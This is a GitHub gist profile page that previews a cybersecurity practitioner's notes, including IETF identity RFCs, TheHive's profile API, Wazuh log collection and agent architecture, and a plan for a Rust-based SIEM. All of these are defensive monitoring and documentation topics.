You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
Instantly share code, notes, and snippets.
Anubhav Gain
anubhavg-icpl
I like to create / contribute to the cybersecurity community whenever I can.
1. What “Identity” Means in the Context of IETF RFC Standards
In the IETF standards process, identity-related RFCs can refer to:
Protocols or extensions that define identity formats, representations, or attributes
Protocols that support authentication and identity assurance
Protocols focused on identity management across systems/domains
Identity-related encryption or identifier representation mechanisms
There is no official IETF category labeled “identity” that lists all RFCs by that topic, so any enumeration must be approximate based on inclusion criteria.
Gerfect! I found the profile API endpoints. The error you're
seeing (/api/v1/profile returns NotFoundError) is because
there's no direct GET endpoint for listing profiles in v1.
However, I can see from the routing that profiles can be
accessed. Let me explain how to list all profiles:
How to List All Profiles in TheHive
Based on the codebase analysis, here are the ways to list
profiles:
Wazuh Agent: Collecting Kernel Logs from journald on Fedora
This document explains how to configure the Wazuh agent on a Fedora system
to collect kernel logs from journald using journalctl, and how to verify
and view them on the Wazuh Dashboard.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
✅ <a href="https://www.gnu.org/software/bash/"><b>GNU Bash</b></a> - is an sh-compatible shell that incorporates useful features from the Korn shell and C shell.<br>
✅ <a href="https://www.zsh.org/"><b>Zsh</b></a> - is a shell designed for interactive use, although it is also a powerful scripting language.<br>
✅ <a href="https://tcl-lang.org/"><b>tclsh</b></a> - is a very powerful cross-platform shell, suitable for a huge range of uses.<br>
✅ <a href="https://github.com/Bash-it/bash-it"><b>bash-it</b></a> - is a framework for using, developing and maintaining shell scripts and custom commands.<br>
Wazuh agents provide enterprise-grade, multi-platform security monitoring with sophisticated log collection, parsing, and forwarding capabilities designed for XDR/OXDR platforms. This analysis reveals that Wazuh employs a modular architecture capable of processing 50,000+ events per second while maintaining minimal system overhead (35MB RAM average) and AES-256 encrypted communications. The platform's open-source nature, combined with extensive SIEM integration capabilities and MITRE ATT&CK framework alignment, positions it as a viable alternative to commercial endpoint detection solutions.
Agent architecture and core logging framework
Wazuh implements a distributed, modular agent architecture where specialized daemons handle distinct security monitoring functions. The core logging subsystem centers around the wazuh-logcollector daemon, which operates through multiple collection engines supporting diverse log formats and sour
Cross-Platform Rust-Based SIEM Platform Implementation Plan
A comprehensive security monitoring solution leveraging Rust's memory safety and performance for enterprise-grade threat detection across Windows, macOS, and Linux environments.
🎯 Executive Summary
This plan outlines the development and deployment of a next-generation Security Information and Event Management (SIEM) platform built on Rust-based technologies. The solution provides unified threat detection, incident response, and forensic analysis capabilities across heterogeneous environments while maintaining security-by-design principles.
Key Differentiators:
Memory Safety: 68% reduction in security vulnerabilities compared to C/C++ implementations
The wazuh-remoted daemon is the core server-side component that manages agent communication and status. It handles the agent keepalive mechanism and updates agent status using the wdb_update_agent_keepalive(agent_id, AGENT_CS_ACTIVE, ...) function.
Location: The remoted daemon runs by default as the wazuh user and is chrooted to /var/ossec.
